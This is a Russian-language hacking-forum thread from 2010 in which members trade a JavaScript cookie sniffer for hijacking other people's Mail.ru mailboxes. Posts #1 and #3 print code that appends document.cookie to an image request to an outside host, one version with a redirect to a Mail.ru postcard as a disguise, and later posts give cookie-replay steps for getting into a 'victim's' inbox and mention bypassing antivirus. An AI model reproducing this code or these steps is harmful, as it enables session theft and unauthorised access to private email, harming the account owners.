HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.01.2010, 01:00
dimulja
Новичок
Регистрация: 24.01.2010
Сообщений: 8
С нами: 8577686

Репутация: 0
По умолчанию

Вот написал такой скриптик, так как куки не приходят, если .img файл открывать локально потому что нет рефера с mail.ru. Теперь вопрос, как человека сначала перевести на mail.ru, а потом уже на снифер, только без флуда пожалуйся.... кто понимает, подкорректируйте плз...можно и в личку...

Test

function Sniffer () {
img = new Image(); img.src = "http://httpz.ru/nuj1gb38u27.gif?"+document.cookie;
}
 
Ответить с цитированием

  #2  
Старый 09.02.2010, 01:00
opalamer
Новичок
Регистрация: 08.02.2010
Сообщений: 0
С нами: 8555131

Репутация: 0
По умолчанию

Здравствуйте! Помогите пожалуйста. Перечитала полностью Особенности взлома почты на Mail.ru у вас на сайте, с куками проблем нет. Куки пришли, поменяла я их в опере тоже без проблем, каспера обошла, захожу на сайт mail.ru пишется логин жертвы и пароль (под звездочками) но когда нажимаю кнопку «Войти» просит ввести пароль. Уже неделю мучаюсь, застряла на этом и ничего не могу сделать. Помогите пожалуйста. За ранние спасибо.:2_2_2:
 
Ответить с цитированием

  #3  
Старый 12.02.2010, 01:00
morgan-id
Новичок
Регистрация: 17.02.2010
Сообщений: 0
С нами: 8542132

Репутация: 0
По умолчанию

объясните
Так тут и не ответили на вопрос , куки не приходят не фига

img = new Image(); img.src = "http://httpz.ru/*******.gif?"+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://images.cards.mail.ru/*******.jpg" // адрес открытки, если хотите, можете заменить на свой
var speed = 3000; // редирект через 3 секунды
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

/*******.gif?"+document.cookie; // здесь ваш код для кражи кукис

какой код ставить надо и где его брать ?
 
Ответить с цитированием

  #4  
Старый 12.02.2010, 01:00
dj-vismut
Постоянный
Регистрация: 17.12.2009
Сообщений: 412
С нами: 8632406

Репутация: 25
По умолчанию

Цитата:

Сообщение от DancerRino

скиньте плз сайт где моно закачать сниффер

всмысле для загрузки собственного ?
 
Ответить с цитированием

  #5  
Старый 12.02.2010, 01:00
morgan-id
Новичок
Регистрация: 17.02.2010
Сообщений: 0
С нами: 8542132

Репутация: 0
По умолчанию

пробовал на свое прописать майле куки
но если сделать выход из акка то куки не проходят
нужно вводить пароль заново
почему так
может что то я делаю не так ?
 
Ответить с цитированием

  #6  
Старый 12.02.2010, 01:00
0x81
Новичок
Регистрация: 03.06.2010
Сообщений: 0
С нами: 8389873

Репутация: 0
По умолчанию

Цитата:

Сообщение от opalamer

Здравствуйте! Помогите пожалуйста. Перечитала полностью Особенности взлома почты на Mail.ru у вас на сайте, с куками проблем нет. Куки пришли, поменяла я их в опере тоже без проблем, каспера обошла, захожу на сайт mail.ru пишется логин жертвы и пароль (под звездочками) но когда нажимаю кнопку «Войти» просит ввести пароль. Уже неделю мучаюсь, застряла на этом и ничего не могу сделать. Помогите пожалуйста. За ранние спасибо.:2_2_2:

во-первых куки нужны свежие. а во-вторых зачем нажимать "войти"?? просто предварительно зайди со своего аккаунта, зайди на страницу просмотра входящих сообщений, подменяй куки и обновляй страницу, если все правильно окажешься в ящике жертвы.
 
Ответить с цитированием

  #7  
Старый 12.02.2010, 01:00
morgan-id
Новичок
Регистрация: 17.02.2010
Сообщений: 0
С нами: 8542132

Репутация: 0
По умолчанию

нет !
я так пробовал
видимо это прикрыли уже
захожу в свой акк меня куки
нажимаю на входящие меня перебрасывает на введение пароля
в чем дело
что не так ?
 
Ответить с цитированием

  #8  
Старый 12.02.2010, 01:00
xakerenok
Новичок
Регистрация: 12.11.2009
Сообщений: 17
С нами: 8682806

Репутация: 9
По умолчанию

Цитата:

Сообщение от morgan-id

нет !
я так пробовал
видимо это прикрыли уже
захожу в свой акк меня куки
нажимаю на входящие меня перебрасывает на введение пароля
в чем дело
что не так ?

Раньше ты так делал??? у тебя так получалось?
 
Ответить с цитированием

  #9  
Старый 12.02.2010, 01:00
morgan-id
Новичок
Регистрация: 17.02.2010
Сообщений: 0
С нами: 8542132

Репутация: 0
По умолчанию

раньше я так не делал
но сейчас я так попробовал на своем ящике
и если войти в в свой ящик
и при этом поменять куки на другой ящик и предварительно на том ящике закончить сессию
то куки не помогаю
при нажатии входящие перебрасывает на тот ящик который закрыл сессию и просит ввести пароль

Добавлено через 1 минуту
видимо дыра уже закрыта в майле
или вчем то в другом дело
я не понимаю
 
Ответить с цитированием

  #10  
Старый 12.02.2010, 01:00
xakerenok
Новичок
Регистрация: 12.11.2009
Сообщений: 17
С нами: 8682806

Репутация: 9
По умолчанию

Цитата:

Сообщение от morgan-id

раньше я так не делал
но сейчас я так попробовал на своем ящике
и если войти в в свой ящик
и при этом поменять куки на другой ящик и предварительно на том ящике закончить сессию
то куки не помогаю
при нажатии входящие перебрасывает на тот ящик который закрыл сессию и просит ввести пароль

Добавлено через 1 минуту
видимо дыра уже закрыта в майле
или вчем то в другом дело
я не понимаю

Куки имеют время жизни. Как только ты нажал выход, тем самым закончил ссесию они перестали быть действительными...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.